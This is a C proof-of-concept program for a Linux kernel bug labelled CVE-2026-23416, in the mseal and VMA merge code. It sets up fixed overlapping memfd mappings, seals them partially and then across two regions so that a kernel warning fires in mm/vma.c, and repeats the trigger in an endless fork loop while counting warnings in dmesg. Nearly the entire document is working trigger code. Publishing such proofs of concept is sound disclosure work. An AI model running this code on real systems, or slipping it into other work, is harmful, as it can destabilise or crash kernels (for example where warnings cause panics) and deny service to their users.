README.md
Rendering markdown...
/*
* CVE-2026-23416-POC
* Affected: Linux kernel 6.17-7.0-rc5 (confirmed)
* mm/vma.c untouched in rc3->rc4 and rc4->rc5 patches.
* Discovered by : Antonius / Blue Dragon Security
* https://bluedragonsec.com
* https://github.com/bluedragonsecurity
*
*/
#define _GNU_SOURCE
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/syscall.h>
#include <sys/wait.h>
#include <unistd.h>
#ifndef __NR_memfd_create
#define __NR_memfd_create 319
#endif
#ifndef __NR_mseal
#define __NR_mseal 462
#endif
static void setup_workspace(void)
{
syscall(__NR_mmap,
(uint64_t)0x1ffffffff000UL, (uint64_t)0x1000UL,
(uint64_t)0UL, (uint64_t)0x32UL, /* MAP_FIXED|MAP_ANON|MAP_PRIVATE */
(intptr_t)-1, (uint64_t)0UL);
syscall(__NR_mmap,
(uint64_t)0x200000000000UL, (uint64_t)0x1000000UL,
(uint64_t)7UL, /* PROT_READ|WRITE|EXEC */
(uint64_t)0x32UL,
(intptr_t)-1, (uint64_t)0UL);
syscall(__NR_mmap,
(uint64_t)0x200001000000UL, (uint64_t)0x1000UL,
(uint64_t)0UL, (uint64_t)0x32UL,
(intptr_t)-1, (uint64_t)0UL);
}
/* ---------------------------------------------------------------
* Core trigger.
*
* After the two mmaps + first mseal, memory layout is:
*
* [0x21da6000 - 0x21de5fff] VMA-A (fd2, MAP_SHARED|MAP_FIXED)
* ^-- first mseal() sets VM_SEALED here
* [0x21de6000 - 0x21e82fff] VMA-B (fd2, MAP_SHARED|MAP_FIXED)
* ^-- NOT sealed when second mseal fires
* [0x21e83000 - 0x21e84fff] VMA-C (leftover)
*
* Second mseal(mmap2_result, 0x70000) targets [0x21da6000-0x21e15fff],
* spanning VMA-A (sealed) into VMA-B (not sealed).
*
* Inside do_mseal() -> mseal_apply() -> vma_modify_flags():
* The call passes the original full mseal start (0x21da8000 from the
* first mseal context) as vmg->start. When vma_merge_existing_range()
* is invoked for VMA-B (middle=[0x21de6000..]):
*
* vmg->start (0x21da8000) != middle->vm_start (0x21de6000)
* AND middle != prev
* -> VM_WARN_ON_VMG fires at mm/vma.c:830
* --------------------------------------------------------------- */
static void trigger(void)
{
intptr_t fd1, fd2, m1, m2;
/* workspace string for memfd names */
memcpy((void *)0x200000000100UL, "syz-mseal\0", 10);
/* fd1: first memfd, mapped at 0x21da8000 */
fd1 = syscall(__NR_memfd_create,
(uint64_t)0x200000000100UL, (uint64_t)1UL);
if (fd1 < 0)
return;
m1 = syscall(__NR_mmap,
(uint64_t)0x21da8000UL, (uint64_t)0xdd000UL,
(uint64_t)8UL, /* PROT_SEM */
(uint64_t)0x11UL, /* MAP_SHARED | MAP_FIXED */
(intptr_t)fd1, (uint64_t)0UL);
/* fd2: second memfd, mapped at 0x21da6000 (overlaps m1 at start) */
memcpy((void *)0x200000000100UL, "syz-mseal\0", 10);
fd2 = syscall(__NR_memfd_create,
(uint64_t)0x200000000100UL, (uint64_t)1UL);
if (fd2 < 0)
return;
m2 = syscall(__NR_mmap,
(uint64_t)0x21da6000UL, (uint64_t)0xdd000UL,
(uint64_t)8UL,
(uint64_t)0x11UL,
(intptr_t)fd2, (uint64_t)0UL);
/*
* Step 1: Partial seal on m1 range.
* Seals [0x21da8000 .. 0x21de5fff] -- a subset of VMA-A.
* Sets VM_SEALED (0x400000000000) on VMA-A.
*/
syscall(__NR_mseal, (uint64_t)m1, (uint64_t)0x3e000UL, (uint64_t)0UL);
/*
* Step 2: Seal spanning VMA-A (sealed) + VMA-B (not sealed).
* Range [0x21da6000 .. 0x21e15fff].
* -> vma_merge_existing_range() WARN fires.
*/
syscall(__NR_mseal, (uint64_t)m2, (uint64_t)0x70000UL, (uint64_t)0UL);
}
int main(void)
{
fprintf(stderr,
"============================================\n"
"CVE-2026-23416-POC\n"
"Discovered by : Antonius / Blue Dragon Security\n"
" https://bluedragonsec.com\n"
" https://github.com/bluedragonsecurity"
"============================================\n");
setup_workspace();
for (int iter = 0;; iter++) {
pid_t pid = fork();
if (pid < 0) {
perror("fork");
return 1;
}
if (pid == 0) {
trigger();
_exit(0);
}
int st;
waitpid(pid, &st, 0);
fprintf(stderr, "[iter %d]\n", iter);
if (iter % 5 == 0)
system("dmesg 2>/dev/null | grep -c 'WARNING.*vma\\.c:830' "
"| xargs -I{} sh -c "
"'[ {} -gt 0 ] && "
"echo \"[+] WARNING triggered {} times total\"'");
}
return 0;
}